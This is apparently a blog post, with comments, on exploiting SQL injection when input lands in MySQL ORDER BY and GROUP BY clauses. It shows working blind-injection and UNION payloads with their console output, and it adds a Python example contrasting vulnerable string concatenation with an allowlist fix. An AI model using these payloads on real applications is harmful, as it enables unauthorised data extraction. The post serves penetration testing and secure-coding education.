Injection in Order by, Group by Clause


Exploiting SQL injections where the input lands in the ORDER BY clause is a bit tricky, because UNION queries are not permitted after ORDER BY. The following can be used in such a scenario to turn it into a blind SQL injection, using a subquery that either evaluates cleanly (condition true) or raises a "Subquery returns more than 1 row" error (condition false):

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)

----

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row

----

For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above will also work for blind injection:

mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
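Both cases above exist because the application pastes user input straight into the ORDER BY or GROUP BY clause, where bind parameters cannot help (they bind values, not identifiers). The following is an added example, not code from the original post: a Python application layer with a sqlite3 in-memory table standing in for the MySQL `news` table (schema, rows and the `SORT_COLUMNS` allowlist are constructed assumptions), showing the vulnerable concatenation beside an allowlisted form that rejects anything other than a known sort key.

```python
import sqlite3

# Constructed stand-in for the post's `news` table (assumption, not the real schema).
SCHEMA = "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published TEXT)"
ROWS = [(1, "first", "2009-01-01"), (2, "second", "2009-02-01"), (3, "third", "2009-01-15")]

# Allowlist: the only sort keys the application accepts, mapped to fixed SQL fragments.
# User input never becomes SQL text; it only selects one of these fragments.
SORT_COLUMNS = {"id": "id", "title": "title", "date": "published"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def connect():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", ROWS)
    return conn

def vulnerable_query(conn, order_by):
    # The pattern the post exploits: the sort expression is concatenated into the
    # statement, so any expression the caller supplies becomes part of ORDER BY.
    sql = "SELECT id FROM news ORDER BY " + order_by
    return [row[0] for row in conn.execute(sql)]

def safe_query(conn, sort_key, direction="asc"):
    # Hardened form: untrusted values are looked up in the allowlist and anything
    # else is rejected before any SQL is built. Placeholders cannot bind column
    # names in ORDER BY / GROUP BY, which is why an allowlist is the right control.
    try:
        column = SORT_COLUMNS[sort_key]
        order = SORT_DIRECTIONS[str(direction).lower()]
    except KeyError:
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT id FROM news ORDER BY {column} {order}"
    return [row[0] for row in conn.execute(sql)]
```

The same lookup-then-build approach applies to a GROUP BY column chosen by the user: map the request value to a fixed fragment, never interpolate the raw string.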

6 Comments

  • Lord says:

    Great. That's exactly what I was searching for.
    Not so great: I do not understand what the example should do…

  • sid says:

    What version of MySQL are you trying this on?

    I think this does not work in some of the recent versions.

  • Lord says:

    Server Version: 5.1.30
    I meant especially the “order by”-case.
    What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?

  • sid says:

    This is how you can convert this into standard true and false responses. Think of that error as a 'false' response, which you get when doing boolean injection;

    e.g. id=100 and 1=1; id=100 and 1=2;

    ----

  • Lord says:

    of course -.-'
    Thank you.

  • GDSG says:

    THANKS MAN!!!
    I tried to figure this out for about 2 days, because IF(1=1,1,1) did not work, but this ROCKS.

    Thanks Again!
